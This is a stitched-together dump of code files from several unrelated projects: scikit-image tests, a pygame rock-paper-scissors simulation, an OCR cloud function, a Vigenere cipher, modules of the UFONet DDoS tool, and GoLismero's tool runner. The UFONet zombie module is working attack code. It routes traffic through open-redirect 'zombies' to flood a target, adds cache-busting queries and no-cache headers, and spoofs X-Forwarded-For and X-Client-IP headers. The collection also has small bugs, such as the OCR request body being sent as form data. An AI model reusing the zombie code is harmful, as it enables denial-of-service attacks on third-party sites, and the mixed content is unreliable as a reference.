assert_array_equal(r, out8)
rank.sum_percentile(image=image8, selem=elem, out=out8, mask=mask,p0=.0,p1=1.)
assert_array_equal(r, out8)
rank.sum_bilateral(image=image8, selem=elem, out=out8, mask=mask,s0=255,s1=255)
assert_array_equal(r, out8)
r = 400* np.array([[1, 2, 3, 2, 1],
[2, 4, 6, 4, 2],
[3, 6, 9, 6, 3],
[2, 4, 6, 4, 2],
[1, 2, 3, 2, 1]], dtype=np.uint16)
rank.sum(image=image16, selem=elem, out=out16, mask=mask)
assert_array_equal(r, out16)
rank.sum_percentile(image=image16, selem=elem, out=out16, mask=mask,p0=.0,p1=1.)
assert_array_equal(r, out16)
rank.sum_bilateral(image=image16, selem=elem, out=out16, mask=mask,s0=1000,s1=1000)
assert_array_equal(r, out16)
if __name__ == "__main__":
run_module_suite()
```
#### File: skimage/util/_regular_grid.py
```python
import numpy as np
def regular_grid(ar_shape, n_points):
"""Find `n_points` regularly spaced along `ar_shape`.
The returned points (as slices) should be as close to cubically-spaced as
possible. Essentially, the points are spaced by the Nth root of the input
array size, where N is the number of dimensions. However, if an array
dimension cannot fit a full step size, it is "discarded", and the
computation is done for only the remaining dimensions.
Parameters
----------
ar_shape : array-like of ints
The shape of the space embedding the grid. ``len(ar_shape)`` is the
number of dimensions.
n_points : int
The (approximate) number of points to embed in the space.
Returns
-------
slices : list of slice objects
A slice along each dimension of `ar_shape`, such that the intersection
of all the slices give the coordinates of regularly spaced points.
Examples
--------
>>> ar = np.zeros((20, 40))
>>> g = regular_grid(ar.shape, 8)
>>> g
[slice(5.0, None, 10.0), slice(5.0, None, 10.0)]
>>> ar[g] = 1
>>> ar.sum()
8.0
>>> ar = np.zeros((20, 40))
>>> g = regular_grid(ar.shape, 32)
>>> g
[slice(2.0, None, 5.0), slice(2.0, None, 5.0)]
>>> ar[g] = 1
>>> ar.sum()
32.0
>>> ar = np.zeros((3, 20, 40))
>>> g = regular_grid(ar.shape, 8)
>>> g
[slice(1.0, None, 3.0), slice(5.0, None, 10.0), slice(5.0, None, 10.0)]
>>> ar[g] = 1
>>> ar.sum()
8.0
"""
ar_shape = np.asanyarray(ar_shape)
ndim = len(ar_shape)
unsort_dim_idxs = np.argsort(np.argsort(ar_shape))
sorted_dims = np.sort(ar_shape)
space_size = float(np.prod(ar_shape))
if space_size <= n_points:
return [slice(None)] * ndim
stepsizes = (space_size / n_points) ** (1.0 / ndim) * np.ones(ndim)
if (sorted_dims < stepsizes).any():
for dim in range(ndim):
stepsizes[dim] = sorted_dims[dim]
space_size = float(np.prod(sorted_dims[dim+1:]))
stepsizes[dim+1:] = ((space_size / n_points) **
(1.0 / (ndim - dim - 1)))
if (sorted_dims >= stepsizes).all():
break
starts = (stepsizes // 2).astype(int)
stepsizes = np.round(stepsizes).astype(int)
slices = [slice(start, None, step) for
start, step in zip(starts, stepsizes)]
slices = [slices[i] for i in unsort_dim_idxs]
return slices
```
|
{
"source": "JeyyGit/rock-paper-scissors-simulation",
"score": 3
}
|
#### File: JeyyGit/rock-paper-scissors-simulation/rps.py
```python
import pygame
import random
import math
pygame.init()
display = pygame.display.set_mode((600, 600))
clock = pygame.time.Clock()
FPS = 30
img_rock = pygame.image.load('emoji_rock.png').convert_alpha()
img_paper = pygame.image.load('emoji_paper.png').convert_alpha()
img_scissors = pygame.image.load('emoji_scissors.png').convert_alpha()
sfx_rock = pygame.mixer.Sound('sound_rock.wav')
sfx_paper = pygame.mixer.Sound('sound_paper.wav')
sfx_scissors = pygame.mixer.Sound('sound_scissors.wav')
class Item:
def __init__(self, xy, radius, velocity, type):
self.xy = xy
self.radius = radius
self.velocity = velocity
self.type = type
def draw(self):
x, y = map(int, self.xy)
if self.type == 'r':
img = img_rock
elif self.type == 'p':
img = img_paper
elif self.type == 's':
img = img_scissors
display.blit(img, (x, y))
def update(self):
self.xy[0] += self.velocity[0]
self.xy[1] += self.velocity[1]
self.draw()
def game():
items = []
for _ in range(30):
items.append(Item([random.randint(50, 550), random.randint(50, 550)], 10, [0, 0], 'r'))
items.append(Item([random.randint(50, 550), random.randint(50, 550)], 10, [0, 0], 'p'))
items.append(Item([random.randint(50, 550), random.randint(50, 550)], 10, [0, 0], 's'))
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
display.fill((255, 255, 255))
rocks = [item for item in items if item.type == 'r']
papers = [item for item in items if item.type == 'p']
sciss = [item for item in items if item.type == 's']
for item in items:
item.velocity = [random.randint(-1, 1), random.randint(-1, 1)]
walk = False
if item.type == 'r':
for sci in sciss:
if math.sqrt(pow(item.xy[0]-sci.xy[0], 2) + pow(item.xy[1]-sci.xy[1], 2)) <= item.radius + sci.radius:
sci.type = 'r'
sfx_rock.play()
break
sciss = [item for item in items if item.type == 's']
dir_x = 0
dir_y = 0
for sci in sciss:
walk = True
dir_x += item.xy[0] - sci.xy[0]
dir_y += item.xy[1] - sci.xy[1]
elif item.type == 'p':
for rock in rocks:
if math.sqrt(pow(item.xy[0]-rock.xy[0], 2) + pow(item.xy[1]-rock.xy[1], 2)) <= item.radius + rock.radius:
rock.type = 'p'
sfx_paper.play()
break
rocks = [item for item in items if item.type == 'r']
dir_x = 0
dir_y = 0
for rock in rocks:
walk = True
dir_x = item.xy[0] - rock.xy[0]
dir_y = item.xy[1] - rock.xy[1]
elif item.type == 's':
for paper in papers:
if math.sqrt(pow(item.xy[0]-paper.xy[0], 2) + pow(item.xy[1]-paper.xy[1], 2)) <= item.radius + paper.radius:
paper.type = 's'
sfx_scissors.play()
break
sciss = [item for item in items if item.type == 's']
dir_x = 0
dir_y = 0
for paper in papers:
walk = True
dir_x = item.xy[0] - paper.xy[0]
dir_y = item.xy[1] - paper.xy[1]
if walk:
walk = random.choice([True, False, True])
if walk:
if dir_x >= 0 and dir_y >= 0:
item.velocity[0] -= 1
item.velocity[1] -= 1
elif dir_x < 0 and dir_y >= 0:
item.velocity[0] += 1
item.velocity[1] -= 1
elif dir_x < 0 and dir_y < 0:
item.velocity[0] += 1
item.velocity[1] += 1
elif dir_x >= 0 and dir_y < 0:
item.velocity[0] -= 1
item.velocity[1] += 1
item.update()
pygame.display.update()
clock.tick(FPS)
game()
pygame.quit()
```
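For reference, the conversion test inside `game()` is a plain Euclidean-distance check: two emojis interact when their centres are no farther apart than the sum of their radii. A tiny standalone illustration (coordinates and radii are made up):

```python
import math

def touching(a, b, r_a, r_b):
    return math.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2) <= r_a + r_b

print(touching((0, 0), (3, 4), 10, 10))    # True: distance 5 vs. combined radius 20
print(touching((0, 0), (30, 40), 10, 10))  # False: distance 50
```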
|
{
"source": "JeyzerMC/Google-Hackathon-2018",
"score": 3
}
|
#### File: JeyzerMC/Google-Hackathon-2018/test.py
```python
import base64
import requests
def get_ocr(request):
"""Responds to any HTTP request.
Args:
request (flask.Request): HTTP request object.
Returns:
The response text or any set of values that can be turned into a
        Response object using
        `make_response <http://flask.pocoo.org/docs/1.0/api/#flask.Flask.make_response>`.
"""
headers = {
'content-type': 'application/json; charset=utf-8'
}
fl = request.files.get('imagefile', '')
if fl:
txt = base64.b64encode(fl.read())
# return 'txt %s' % txt
pdata = {
'requests': [
{
'image': {
'content': str(txt)
},
'features': [
{
'type': 'TEXT_DETECTION'
}
]
}
]
}
r = requests.post(
"https://vision.googleapis.com/v1/images:annotate?key=DONTPUSHKEY", headers=headers, data=pdata)
        return 'res %s' % r.text
data = request.data
if data:
return 'data %s' % data
args = request.args
if args:
return 'args %s' % args
return 'nada'
```
|
{
"source": "JeyZeta/Dangerous-",
"score": 4
}
|
#### File: Cifrado/vigenere/vigenere.py
```python
abc = 'abcdefghijklmnopqrstuvwxyz'
def cifrar(cadena, clave):
text_cifrar = ''
i = 0
for letra in cadena:
suma = abc.find(letra) + abc.find(clave[i % len(clave)])
modulo = int(suma) % len(abc)
text_cifrar = text_cifrar + str(abc[modulo])
i=i+1
return text_cifrar
def descifrar(cadena, clave):
text_cifrar = ''
i = 0
for letra in cadena:
suma = abc.find(letra) - abc.find(clave[i % len(clave)])
modulo = int(suma) % len(abc)
text_cifrar = text_cifrar + str(abc[modulo])
i=i+1
return text_cifrar
def main():
c = str(raw_input('cadena a cifrar: ')).lower()
clave = str(raw_input('clave: ')).lower()
print cifrar(c,clave)
c = str(raw_input('cadena a descifrar: ')).lower()
clave = str(raw_input('clave: ')).lower()
print descifrar(c,clave)
if __name__ == '__main__':
main()
```
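A worked example of the shift arithmetic above (inputs are arbitrary): each plaintext letter index is added to the matching key letter index modulo 26, and decryption subtracts it again.

```python
# cifrar("hola", "abc"):
#   h(7)  + a(0) = 7  -> 'h'
#   o(14) + b(1) = 15 -> 'p'
#   l(11) + c(2) = 13 -> 'n'
#   a(0)  + a(0) = 0  -> 'a'
# so cifrar("hola", "abc") == "hpna" and descifrar("hpna", "abc") == "hola".
```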
#### File: ufonet/core/ajaxmap.py
```python
import socket, threading, re, base64, os, time
import webbrowser, subprocess, urllib2, json, sys
from urlparse import urlparse
from main import UFONet
import base64, traceback
try:
import pygeoip
except:
print "\nError importing: pygeoip lib. \n\n On Debian based systems:\n\n $ sudo apt-get install python-geoip\n"
sys.exit(2)
class AjaxMap(object):
def __init__(self):
self._geoip=None
self._geoasn=None
self._geoipstatus='nomap'
self._err=''
def get_err(self):
return self._err
# check for geoip data status
# basic lock file mechanism to avoid multiple downloads
def get_status(self):
if os.path.exists('maps.downloading'):
if not os.path.exists('maps.downloadmsg'):
f=open("maps.downloadmsg","wb")
f.write("")
f.close()
print "[Webgui] GeoIP data download started"
print "[Webgui] if this error message persists : remove maps.downloading and maps folder, then restart ufonet"
self._geoipstatus='downloading'
elif os.path.isdir('maps'):
if self._geoip == None :
self._geoip = pygeoip.GeoIP('maps/GeoLiteCity.dat')
if self._geoasn == None :
self._geoasn = pygeoip.GeoIP('maps/GeoIPASNum.dat')
if os.path.exists("maps.downloadmsg") :
os.remove("maps.downloadmsg")
self._geoipstatus='ok'
return self._geoipstatus
def retrieve(self,url,name):
try:
handle = urllib2.urlopen(url)
CHUNK = 16384
with open(name,'wb') as fp:
while True:
chunk = handle.read(CHUNK)
if not chunk:
break
fp.write(chunk)
except:
traceback.print_exc()
def download_maps(self):
import subprocess, shlex
# generate geolocation values on a map
if self.get_status() != 'nomap':
return self._geoipstatus == 'ok'
if os.path.exists("maps.downloadmsg"):
os.remove("maps.downloadmsg")
f=open("maps.downloading",'w')
f.write("download started<script>$'('#ufomsg').load('/js/ajax.js?fetchmap=')")
f.close()
self._geoipstatus="downloading"
# download maps folder
geo_db_mirror1 = 'http://172.16.31.10/bordercheck/maps.tar.gz' # Turina Server
geo_db_mirror2 = 'http://8172.16.58.3/bordercheck/maps.tar.gz' # Mirror
try: # mirror 1
print "\n[Info] - Fetching maps from 'Mirror 1':", geo_db_mirror1 + "\n"
response = self.retrieve(geo_db_mirror1, 'maps.tar.gz')
except:
try: # mirror 2
print "[Error] - Mirror 1':", geo_db_mirror1 + " Failed!\n"
print "[Info] - Fetching maps from 'Mirror 2':", geo_db_mirror2 + "\n"
response = self.retrieve(geo_db_mirror2, 'maps.tar.gz')
except:
print("[Error] - Something wrong fetching maps from mirrors ...Aborting!"), "\n"
traceback.print_exc()
return False #sys.exit(2)
subprocess.call(shlex.split('tar zxfv maps.tar.gz'))
print "\n[Info] GeoIP maps and databases: ready!\n"
# set pygeoip data sources
self._geoip = pygeoip.GeoIP('maps/GeoLiteCity.dat')
self._geoasn = pygeoip.GeoIP('maps/GeoIPASNum.dat')
self._geoipstatus='ok'
os.remove('maps.tar.gz')
os.remove('maps.downloading')
return True
# fetches geoip data for specified zombie
def geo_ip(self, zombie):
# check for status, downloading is done by ajax() method
if self.get_status() != 'ok':
if self._geoipstatus =='downloading':
print "\n[Info] GeoIP maps and databases: downloading\n"
self._err= "ufomsg('downloading maps...')"
elif not os.path.exists('maps/GeoIPASNum.dat') or not os.path.exists('maps/GeoLiteCity.dat'):
print "\n[Info] GeoIP maps and databases: download starting!\n"
self._err= "ufomsg('map download starting')\n$('#ufomsg').load('/js/ajax.js?fetchgeoip=')"
else:
print "\n[Info] GeoIP maps and databases: unknown error\n"
self._err= "ufomsg('maps: unknown error...')"
return None
if re.match(r'^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^192.168\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^172.(1[6-9]|2[0-9]|3[0-1]).[0-9]{1,3}.[0-9]{1,3}$', zombie) or re.match('localhost', zombie):
self._err= "ufomsg('maps: invalid ip data...')"
return None
# create geoip data skeleton
geo_zombie={}
geo_zombie['qq']=zombie
url = urlparse(zombie)
geo_zombie['city'] = '-'
geo_zombie['country'] = '-'
geo_zombie['country_code'] = '-'
geo_zombie['longitude'] = '-'
geo_zombie['latitude'] = '-'
geo_zombie['ip'] = '-'
geo_zombie['host_name'] = '-'
geo_zombie['asn'] = '-'
geo_zombie['latitude'] = '-'
# retrieve and allocate geoip data
try:
ip = socket.gethostbyname(url.netloc)
except:
self._err= "ufomsg('geoip: hostbyname failed for "+str(url.netloc)+"...')"
return None
if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
geo_zombie['ip'] = ip
try:
record = self._geoip.record_by_addr(ip)
except:
self._err= "ufomsg('geoip: lookup failed for "+ip+", page reload required...')"
return None
try:
asn = self._geoasn.org_by_addr(ip)
if asn is not None:
geo_zombie['asn'] = asn.encode('utf-8')
except:
geo_zombie['asn'] = 'No ASN provided'
try:
geo_zombie['host_name'] = socket.gethostbyaddr(ip)[0].encode('utf-8')
except:
geo_zombie['host_name'] = 'No hostname'
try:
longitude = str(float(record['longitude']))
geo_zombie['longitude'] = longitude
latitude = str(float(record['latitude']))
geo_zombie['latitude'] = latitude
except:
pass
try:
geo_zombie['country'] = record["country_name"].encode('utf-8')
geo_zombie['country_code'] = record["country_code"].lower().encode('utf-8')
if record['city'] is not None:
geo_zombie['city'] = record["city"].encode('utf-8')
except:
pass
return geo_zombie
# generates javascipt for adding a new zombie with geoip data
def get_js(self,z):
ret = ""
gz = self.geo_ip(z)
if gz is not None and gz['latitude']!= '-':
ret = "Zombies.add('"+z+"',Array(new L.LatLng("+str(gz['latitude'])+","+str(gz['longitude'])+"),'"+gz['city']+"','"+gz['country']+"','"+gz['country_code']+"','"+gz['asn']+"','"+gz['ip']+"','"+gz['host_name']+"'))\n"
else:
print 'geozombie dead : ',z
ret += "dead_zombies.push('"+z+"')\n"
ret += "last_zombie = '"+z+"'\n"
return ret
# fetches next zombie from list
def get_next_zombie(self,name):
ufonet = UFONet()
ufonet.create_options()
zombies = ufonet.extract_zombies()
if name in zombies :
for z in zombies :
if name == None:
return z
if z == name :
name = None
return None
else:
return zombies[0]
# ajax controller
def ajax(self,pGet={}):
if 'fetchgeoip' in pGet.keys():
if self.get_status() == "nomap":
self.download_maps()
return "geoip data download done<br/>"
if 'stats' in pGet.keys():
stat='<script>$(".ufo_stat_div").show()</script>'
if os.path.exists('/tmp/ufonet.html'):
for x in open(r'/tmp/ufonet.html').readlines():
stat = stat + x
else:
stat="<i>Waiting for statistics generation...</i>"
return stat+"</div>"
if self.get_status() != "ok":
dljs=""
if self.get_status() == "nomap":
dljs+="$('#ufomsg').load('/js/ajax.js?fetchgeoip=')\n"
if 'doll' in pGet.keys():
dljs+="$('#ufomsg').load('/js/ajax.js?fetchdoll="+pGet['doll']+"')\n"
dljs+="doll=new Doll('"+pGet["doll"]+"')\n"
return "GeoIP data download in progress...<br><i>see console for errors</i>+<script>"+dljs+"</script>"
if 'zombie' in pGet.keys():
zn=base64.b64decode(pGet['zombie'])
nzn=self.get_next_zombie(zn)
if nzn is not None:
zombie=self.get_js(nzn)
return """ <script>
"""+zombie+"""
ufomsg('Adding zombie """+nzn+"""...')
</script>"""
else:
return "<script>zdone=true\nufomsg('all zombies ready !')\n </script>\n"
if 'fetchdoll' in pGet.keys():
tn=pGet['fetchdoll']
target = self.geo_ip(tn)
if target is None:
return "doll waiting for geoip data !"
return """ doll up !<script>
doll.setData(Array(new L.LatLng("""+str(target['latitude'])+","+str(target['longitude'])+"),'"+target['city']+"','"+target['country']+"','"+target['country_code']+"','"+target['asn']+"','"+target['ip']+"','"+target['host_name']+"'))\nufomsg('Adding target """+tn+"""...')\ndoll.show() </script>"""
if 'doll' in pGet.keys():
tn=pGet['doll']
print "loading doll ",tn
return """<script>
doll=new Doll('"""+tn+"""')\n</script>"""
return "\n"
```
#### File: ufonet/core/update.py
```python
import os
from subprocess import PIPE
from subprocess import Popen as execute
class Updater(object):
"""
Update UFONet automatically from a .git repository
"""
def __init__(self):
GIT_REPOSITORY = "https://github.com/epsylon/ufonet"
rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
if not os.path.exists(os.path.join(rootDir, ".git")):
print "Not any .git repository found!\n"
print "="*30
print "\nYou should clone UFONet manually with:\n"
print "$ git clone %s" % GIT_REPOSITORY
else:
checkout = execute("git checkout .", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
if "fast-forwarded" in checkout:
pull = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE).communicate()
print "Congratulations!! UFONet has been updated to latest version ;-)\n"
else:
print "You are updated! ;-)\n"
```
#### File: ufonet/core/zombie.py
```python
import pycurl, StringIO, md5, re
import time, threading, random
from randomip import RandomIP
class Zombie: # class representing a zombie
# constructor: function to construct a zombie
# ufo: UFONet object, some state variables are recovered as well
# zombie: name/url of zombie
def __init__(self, ufo, zombie):
self.ufo = ufo
self.payload=ufo.payload
self.attack_mode=ufo.attack_mode
self.zombie = zombie
self.connection_failed=True
# wait for semaphore to be ready, add to herd, connect & suicide
def connect(self):
reply=None
with self.ufo.sem:
self.ufo.herd.new_zombie(self.zombie)
reply=self.do_connect()
self.ufo.herd.kill_zombie(self.zombie, reply, self.connection_failed)
return reply
# handles zombie connection
def do_connect(self):
# connect zombies and manage different options: HEAD, GET, POST,
# user-Agent, referer, timeout, retries, threads, delay..
options = self.ufo.options
c = pycurl.Curl()
if self.ufo.head == True:
c.setopt(pycurl.URL, self.zombie) # set 'self.zombie' target
c.setopt(pycurl.NOBODY, 1) # use HEAD
if self.payload == True:
payload = self.zombie + "https://www.whitehouse.gov" #Open Redirect payload [requested by all UFONet motherships ;-)]
c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
c.setopt(pycurl.NOBODY, 0) # use GET
if self.ufo.external == True:
external_service = "http://www.downforeveryoneorjustme.com/" # external check
if options.target.startswith('https://'): # fixing url prefix
options.target = options.target.replace('https://','')
if options.target.startswith('http://'): # fixing url prefix
options.target = options.target.replace('http://','')
external = external_service + options.target
c.setopt(pycurl.URL, external) # external HEAD check before to attack
c.setopt(pycurl.NOBODY, 0) # use GET
if self.attack_mode == True:
if options.place: # use self.zombie's vector to connect to a target's place and add a random query to evade cache
random_name_hash = random.randint(1, 100000000)
random_hash = random.randint(1, 100000000)
if options.place.endswith("/"):
options.place = re.sub('/$', '', options.place)
if options.place.startswith("/"):
if "?" in options.place:
url_attack = self.zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
else:
url_attack = self.zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
else:
if "?" in options.place:
url_attack = self.zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
else:
url_attack = self.zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
else:
url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
if self.ufo.options.verbose:
print "[INFO] Payload:", url_attack
c.setopt(pycurl.URL, url_attack) # GET connection on target site
c.setopt(pycurl.NOBODY, 0) # use GET
# set fake headers (important: no-cache)
fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg',
'Connection: Keep-Alive',
'Content-type: application/x-www-form-urlencoded; charset=UTF-8',
'Cache-control: no-cache',
'Pragma: no-cache',
'Pragma-directive: no-cache',
'Cache-directive: no-cache',
'Expires: 0']
c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
if options.xforw: # set x-forwarded-for
generate_random_xforw = RandomIP()
xforwip = generate_random_xforw._generateip('')
xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
fakeheaders = fakeheaders + xforwfakevalue
if options.xclient: # set x-client-ip
generate_random_xclient = RandomIP()
xclientip = generate_random_xclient._generateip('')
xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
fakeheaders = fakeheaders + xclientfakevalue
if options.host: # set http host header
host_fakevalue = ['Host: ' + str(options.host)]
fakeheaders = fakeheaders + host_fakevalue
c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
b = StringIO.StringIO()
c.setopt(pycurl.HEADERFUNCTION, b.write)
h = StringIO.StringIO()
c.setopt(pycurl.WRITEFUNCTION, h.write)
if options.agent: # set user-agent
c.setopt(pycurl.USERAGENT, options.agent)
else:
c.setopt(pycurl.USERAGENT, self.ufo.user_agent)
if options.referer: # set referer
c.setopt(pycurl.REFERER, options.referer)
else:
c.setopt(pycurl.REFERER, self.ufo.referer)
if options.proxy: # set proxy
c.setopt(pycurl.PROXY, options.proxy)
else:
c.setopt(pycurl.PROXY, '')
if options.timeout: # set timeout
c.setopt(pycurl.TIMEOUT, options.timeout)
c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
else:
c.setopt(pycurl.TIMEOUT, 10)
c.setopt(pycurl.CONNECTTIMEOUT, 10)
if options.delay: # set delay
self.ufo.delay = options.delay
else:
self.ufo.delay = 0
if options.retries: # set retries
self.ufo.retries = options.retries
else:
self.ufo.retries = 1
try: # try to connect
c.perform()
time.sleep(self.ufo.delay)
self.connection_failed = False
except Exception, e: # try retries
for count in range(0, self.ufo.retries):
time.sleep(self.ufo.delay)
try:
c.perform()
self.connection_failed = False
except:
self.connection_failed = True
if self.ufo.head == True: # HEAD reply
code_reply = c.getinfo(pycurl.HTTP_CODE)
reply = b.getvalue()
if options.verbose:
print "Reply:"
print "\n", reply
return code_reply
if self.ufo.external == True: # External reply
external_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", external_reply
return external_reply
if self.payload == True: # Payloads reply
payload_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", payload_reply
return payload_reply
if self.attack_mode == True: # Attack mode reply
attack_reply = h.getvalue()
if options.verbose:
print "[Response] code: ", c.getinfo(c.RESPONSE_CODE)," time ",c.getinfo(c.TOTAL_TIME)," size ", len(attack_reply)
return [ c.getinfo(c.RESPONSE_CODE),
c.getinfo(c.TOTAL_TIME),
len(attack_reply)]
```
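The connector above wires a long list of pycurl options by hand. The sketch below is an editorial, minimal illustration of the same pattern (separate header/body buffers, custom headers, redirects and timeouts). The `fetch` helper and the example URL are hypothetical and not part of the original tool; Python 2 and pycurl are assumed, as in the original file.
```python
# Minimal pycurl GET sketch (editorial example, not part of the original tool).
import pycurl
import StringIO


def fetch(url, headers=None, timeout=10):
    c = pycurl.Curl()
    head = StringIO.StringIO()   # response headers are written here
    body = StringIO.StringIO()   # response body is written here
    c.setopt(pycurl.URL, url)
    c.setopt(pycurl.FOLLOWLOCATION, 1)   # follow redirects
    c.setopt(pycurl.MAXREDIRS, 10)
    c.setopt(pycurl.CONNECTTIMEOUT, timeout)
    c.setopt(pycurl.TIMEOUT, timeout)
    c.setopt(pycurl.HEADERFUNCTION, head.write)
    c.setopt(pycurl.WRITEFUNCTION, body.write)
    if headers:                          # e.g. ['Cache-control: no-cache']
        c.setopt(pycurl.HTTPHEADER, headers)
    c.perform()
    code = c.getinfo(pycurl.HTTP_CODE)
    c.close()
    return code, head.getvalue(), body.getvalue()


if __name__ == "__main__":
    code, raw_headers, content = fetch("http://example.com",
                                       headers=['Cache-control: no-cache'])
    print code, len(content)
```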
#### File: golismero/api/external.py
```python
Golismero project site: https://github.com/golismero
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = [
# Run an external tool.
"run_external_tool",
# Bundled tools folder.
"get_tools_folder",
# Temporary file utility functions.
"tempfile",
"tempdir",
# Executable file utility functions.
"is_executable",
"get_interpreter",
"find_binary_in_path",
# Cygwin utility functions.
"is_cygwin_binary",
"get_cygwin_binary",
"find_cygwin_binary_in_path",
"win_to_cygwin_path",
"cygwin_to_win_path",
]
from ..common import get_tools_folder # exported
import contextlib
import re
import os
import os.path
import ntpath
import subprocess
import stat
import shlex
import sys
from shutil import rmtree
from tempfile import NamedTemporaryFile, mkdtemp
# Needed on non-Windows platforms to prevent a NameError.
try:
WindowsError
except NameError:
class WindowsError(OSError): pass
#------------------------------------------------------------------------------
class ExternalToolError(RuntimeError):
"""
An error occurred when running an external tool.
"""
def __init__(self, msg, errcode):
super(ExternalToolError, self).__init__(self, msg)
self.errcode = errcode
#------------------------------------------------------------------------------
def run_external_tool(command, args = None, env = None, cwd = None,
callback = None):
"""
Run an external tool and optionally fetch the output.
Standard output and standard error are combined into a single stream.
    Newline characters are always '\\n' on all platforms.
.. warning: SECURITY WARNING: Be *extremely* careful when passing
data coming from the target servers to this function.
Failure to properly validate the data may result in
complete compromise of your machine! See:
https://www.owasp.org/index.php/Command_Injection
Example:
>>> def callback(line):
... print line
...
>>> run_external_tool("uname", callback=callback)
Linux
:param command: Command to execute.
:type command: str
:param args: Arguments to be passed to the command.
:type args: list(str)
:param env: Environment variables to be passed to the command.
:type env: dict(str -> str)
:param cwd: Current directory while running the tool.
This is useful for tools that require you to be standing on a specific
directory when running them.
:type cwd: str | None
:param callback: Optional callback function. If given, it will be called
once for each line of text printed by the external tool. The trailing
newline character of each line is removed.
:type callback: callable
:returns: Return code from the external tool.
:rtype: int
:raises ExternalToolError: An error occurred when running an external tool.
"""
# We put a large and nasty security warning here mostly to scare the noobs,
# because subprocess is generally safe when you don't run in "shell" mode
# nor invoke bash directly - i.e. when you know what the hell you're doing.
#
# Still, especially on Windows, some external programs are really stupid
# when it comes to parsing their own command line, so caveat emptor.
# Validate the callback argument.
if callback is not None and not callable(callback):
raise TypeError("Expected function, got %r instead" % type(callback))
# An empty string in 'cwd' breaks Popen, so we need to convert it to None.
if not cwd:
cwd = None
# Make a copy of the command line arguments.
if not args:
args = []
else:
args = list(args)
if not command:
command = args[0]
del args[0]
elif args and args[0] == command:
del args[0]
if not command:
raise ValueError("Bad arguments for run_external_tool()")
# Check if the command is executable.
if not is_executable(command):
# Check if the command is a script.
try:
interpreter = get_interpreter(command)
except IOError:
interpreter = None
if interpreter:
# Prepend the interpreter to the command line.
command = interpreter[0]
args = interpreter[1:] + args
# If it's not a script...
else:
# Find the target in the path.
binary_list = find_binary_in_path(command)
if not binary_list:
raise IOError("File not found: %r" % command)
# On Windows, prefer Cygwin binaries over native binaries.
# Otherwise, just pick the first one in the PATH.
if os.path.sep == "\\":
binary = get_cygwin_binary(binary_list)
if binary:
command = binary
else:
command = binary_list[0]
else:
command = binary_list[0]
# Prepend the binary to the command line.
args.insert(0, command)
# Turn off DOS path warnings for Cygwin.
if os.path.sep == "\\":
if env is None:
env = os.environ.copy()
else:
env = env.copy()
cygwin = env.get("CYGWIN", "")
if "nodosfilewarning" not in cygwin:
if cygwin:
cygwin += " "
cygwin += "nodosfilewarning"
env["CYGWIN"] = cygwin
# If the user doesn't want the output,
# just run the process and wait for completion.
if callback is None:
return subprocess.check_call(args,
executable = command,
cwd = cwd,
env = env,
shell = False)
proc = None
try:
# Spawn the process.
try:
proc = subprocess.Popen(args,
executable = command,
cwd = cwd,
env = env,
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
universal_newlines = True,
bufsize = 0,
shell = False,
)
# On error raise ExternalToolError.
except OSError, e:
msg = str(e)
if isinstance(e, WindowsError):
if "%1" in msg:
msg = msg.replace("%1", command)
raise ExternalToolError(msg, e.winerror)
raise ExternalToolError(msg, e.errno)
# Read each line of output and send it to the callback function.
while True:
line = proc.stdout.readline()
if not line:
break
if line.endswith("\n"):
line = line[:-1]
callback(line)
finally:
# Make sure the spawned process is dead.
if proc is not None and proc.poll() is None:
proc.terminate()
# Return the exit code.
return proc.returncode
#------------------------------------------------------------------------------
def is_executable(binary):
"""
Tests if the given file exists and is executable.
:param binary: Path to the binary.
:type binary: str
:returns: True if the file exists and is executable, False otherwise.
:rtype: bool
"""
return os.path.isfile(binary) and (
(os.path.sep == "\\" and binary.lower().endswith(".exe")) or
(os.path.sep == "/" and
os.stat(binary)[stat.ST_MODE] & stat.S_IXUSR != 0)
)
#------------------------------------------------------------------------------
# Default interpreter for each script file extension.
DEFAULT_INTERPRETER = {
".lua": ["lua"],
".php": ["php", "-f"],
".pl": ["perl"],
".rb": ["ruby"],
